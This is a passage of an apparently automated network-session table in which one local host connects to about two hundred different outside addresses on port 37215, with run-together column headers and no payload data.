                                                          9718192.168.2.1553460104.116.80.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9719192.168.2.1547526157.235.184.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9720192.168.2.1555846197.8.37.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9721192.168.2.154271241.233.111.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9722192.168.2.1535458157.35.83.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9723192.168.2.1555092157.123.58.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9724192.168.2.1560804197.177.42.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9725192.168.2.1554124159.146.207.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9726192.168.2.154363641.18.227.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9727192.168.2.1547918114.158.133.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9728192.168.2.1542604197.26.67.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9729192.168.2.1549024157.129.56.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9730192.168.2.155584841.95.78.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9731192.168.2.1556344209.64.179.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9732192.168.2.1559662210.10.54.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9733192.168.2.1550662197.6.28.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9734192.168.2.1536500107.233.56.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9735192.168.2.154050041.96.133.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9736192.168.2.153304441.103.117.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9737192.168.2.1543354157.166.219.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9738192.168.2.1532816157.182.221.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9739192.168.2.1552196157.156.14.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9740192.168.2.155780641.66.115.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9741192.168.2.1556786157.150.151.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9742192.168.2.1545428197.201.220.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9743192.168.2.1560098157.213.132.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9744192.168.2.153591041.56.81.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9745192.168.2.1550904157.41.168.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9746192.168.2.1552724157.74.251.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9747192.168.2.1543574157.108.61.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9748192.168.2.1545500197.183.11.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9749192.168.2.1559966197.206.232.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9750192.168.2.154999641.83.87.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9751192.168.2.1544270157.5.79.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9752192.168.2.153803418.27.5.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9753192.168.2.1550462197.146.213.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9754192.168.2.153910251.163.183.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9755192.168.2.1537882157.151.0.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9756192.168.2.155554441.202.184.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9757192.168.2.1555772222.3.249.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9758192.168.2.1547266115.80.134.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9759192.168.2.1534642197.12.49.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9760192.168.2.155085841.200.149.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9761192.168.2.153697466.204.209.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9762192.168.2.153427245.162.38.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9763192.168.2.155724641.142.103.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9764192.168.2.1557186135.20.113.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9765192.168.2.1549904157.54.43.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9766192.168.2.1532984197.120.139.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9767192.168.2.1546686197.47.147.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9768192.168.2.1539484197.72.190.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9769192.168.2.154642041.191.196.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9770192.168.2.1560202197.28.243.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9771192.168.2.1534904157.253.125.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9772192.168.2.1558562197.248.222.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9773192.168.2.1560024156.14.241.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9774192.168.2.155429441.134.229.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9775192.168.2.1558078193.68.183.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9776192.168.2.15562925.132.156.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9777192.168.2.1545134157.198.68.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9778192.168.2.154640468.70.82.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9779192.168.2.155555041.178.36.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9780192.168.2.153662241.167.245.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9781192.168.2.1556944197.53.139.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9782192.168.2.1559860157.166.175.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9783192.168.2.1546986197.149.10.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9784192.168.2.1556912197.43.8.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9785192.168.2.1555506197.128.140.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9786192.168.2.1534394115.6.254.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9787192.168.2.1548504197.49.131.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9788192.168.2.1558024157.112.202.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9789192.168.2.1545826197.226.135.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9790192.168.2.155831241.137.141.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9791192.168.2.154563841.52.170.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9792192.168.2.153441241.234.235.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9793192.168.2.1550736206.167.184.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9794192.168.2.1532862197.222.223.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9795192.168.2.154861041.51.40.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9796192.168.2.1555908197.48.144.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9797192.168.2.1548416197.182.49.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9798192.168.2.1539976157.233.73.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9799192.168.2.1542468197.132.224.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9800192.168.2.1553216185.230.8.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9801192.168.2.154669242.12.214.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9802192.168.2.1536128157.88.82.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9803192.168.2.1542516197.228.76.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9804192.168.2.153559669.229.252.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9805192.168.2.155542841.205.107.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9806192.168.2.153442441.47.205.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9807192.168.2.155658241.159.20.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9808192.168.2.1532996153.235.233.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9809192.168.2.1537156197.81.52.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9810192.168.2.1555196157.37.175.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9811192.168.2.1546384194.28.250.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9812192.168.2.155661087.209.79.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9813192.168.2.153525241.39.76.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9814192.168.2.1549278157.228.18.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9815192.168.2.1539308159.251.104.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9816192.168.2.155968641.10.64.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9817192.168.2.1548618157.35.232.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9818192.168.2.1544092222.241.121.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9819192.168.2.1546868157.95.98.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9820192.168.2.1535894131.144.46.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9821192.168.2.1548742157.244.251.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9822192.168.2.155707441.243.185.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9823192.168.2.1537340189.101.143.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9824192.168.2.155072041.73.170.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9825192.168.2.1559306157.132.35.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9826192.168.2.1537240197.12.232.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9827192.168.2.154372841.249.228.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9828192.168.2.1550118157.35.147.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9829192.168.2.1542504196.232.212.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9830192.168.2.1553390157.162.79.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9831192.168.2.1551310197.211.178.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9832192.168.2.1550874157.24.144.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9833192.168.2.154541441.93.45.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9834192.168.2.153381241.46.161.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9835192.168.2.154642093.154.136.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9836192.168.2.153695041.174.183.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9837192.168.2.1557152100.173.157.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9838192.168.2.153434041.14.100.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9839192.168.2.153535249.215.108.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9840192.168.2.1545194197.53.174.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9841192.168.2.1545618157.71.38.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9842192.168.2.1551576157.201.188.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9843192.168.2.154958825.96.191.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9844192.168.2.1560964197.173.28.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9845192.168.2.1546220169.209.112.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9846192.168.2.1548944218.161.111.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9847192.168.2.1548622197.158.193.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9848192.168.2.154363641.130.202.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9849192.168.2.153398666.98.203.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9850192.168.2.1559728157.51.106.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9851192.168.2.154055841.75.208.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9852192.168.2.1545366166.28.107.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9853192.168.2.1541716157.86.180.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9854192.168.2.156007666.152.84.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9855192.168.2.1533834157.129.141.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9856192.168.2.154952641.136.75.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9857192.168.2.1547482157.237.176.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9858192.168.2.1534490194.41.43.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9859192.168.2.1560408157.104.236.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9860192.168.2.1548418132.45.160.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9861192.168.2.154711699.3.102.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9862192.168.2.1560850117.61.199.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9863192.168.2.155278841.63.91.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9864192.168.2.153560681.87.114.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9865192.168.2.1533030197.124.234.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9866192.168.2.154578820.142.168.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9867192.168.2.1560952157.201.137.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9868192.168.2.1558378188.42.185.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9869192.168.2.1552904176.50.172.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9870192.168.2.1533992205.94.192.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9871192.168.2.155322041.116.129.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9872192.168.2.155029041.75.242.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9873192.168.2.153621078.236.51.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9874192.168.2.1542838197.183.118.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9875192.168.2.153693625.198.143.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9876192.168.2.154985637.83.227.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9877192.168.2.1554610197.52.84.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9878192.168.2.154024641.156.42.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9879192.168.2.1543212157.120.104.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9880192.168.2.155257241.49.91.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9881192.168.2.154164027.227.171.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9882192.168.2.1551324197.35.109.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9883192.168.2.153882641.58.187.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9884192.168.2.1545120157.223.35.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9885192.168.2.1539896197.222.222.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9886192.168.2.1538844157.112.204.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9887192.168.2.1553990157.145.83.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9888192.168.2.1552402157.48.205.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9889192.168.2.155382641.224.60.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9890192.168.2.1549470157.216.118.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9891192.168.2.154053041.4.240.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9892192.168.2.153629241.163.185.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9893192.168.2.1560732170.136.180.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9894192.168.2.153281241.53.251.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9895192.168.2.1560270157.87.63.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9896192.168.2.1540698197.227.72.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9897192.168.2.153832041.78.37.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9898192.168.2.153278441.86.142.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9899192.168.2.1537768157.108.175.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9900192.168.2.1555638157.134.154.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9901192.168.2.154937466.199.70.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9902192.168.2.153308218.147.123.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9903192.168.2.1556544197.219.200.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9904192.168.2.154523066.61.120.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9905192.168.2.153886241.64.162.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9906192.168.2.1545198157.174.70.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9907192.168.2.1538442157.102.184.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9908192.168.2.1536608157.73.166.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9909192.168.2.1550358197.117.127.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9910192.168.2.1550396197.135.237.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9911192.168.2.1537956157.40.25.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9912192.168.2.1538920197.150.245.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9913192.168.2.1537226208.216.96.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9914192.168.2.1551552157.188.170.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9915192.168.2.1544600197.242.3.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9916192.168.2.1552414197.134.164.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9917192.168.2.1556600157.196.230.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9918192.168.2.154105684.136.37.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9919192.168.2.153771441.175.252.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9920192.168.2.1545498131.100.182.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9921192.168.2.1537946176.124.147.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9922192.168.2.1546596148.221.168.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9923192.168.2.1552170157.23.110.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9924192.168.2.154473041.231.142.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9925192.168.2.1544232157.149.87.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9926192.168.2.1533536157.83.77.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9927192.168.2.1535512197.154.172.4437215
